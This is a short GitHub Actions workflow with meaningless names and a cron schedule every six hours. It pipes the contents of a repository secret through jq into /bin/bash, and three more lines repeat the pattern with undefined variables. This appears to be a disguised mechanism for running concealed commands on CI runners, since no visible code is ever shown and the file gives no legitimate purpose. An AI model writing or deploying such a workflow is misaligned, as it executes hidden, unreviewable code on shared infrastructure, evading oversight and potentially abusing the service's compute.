name: ninboning
on:
  workflow_dispatch:
  schedule:
    - cron: '49 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: ninboning
        env:
          d7649: ${{ secrets.d7649 }}
        run: |
          echo $d7649 | jq -r .j3516 | /bin/bash
          echo $jb22 | jq -r .s1 | /bin/bash
          echo $gqu190 | jq -r .o09372 | /bin/bash
          echo $anr4116 | jq -r .jty7 | /bin/bash

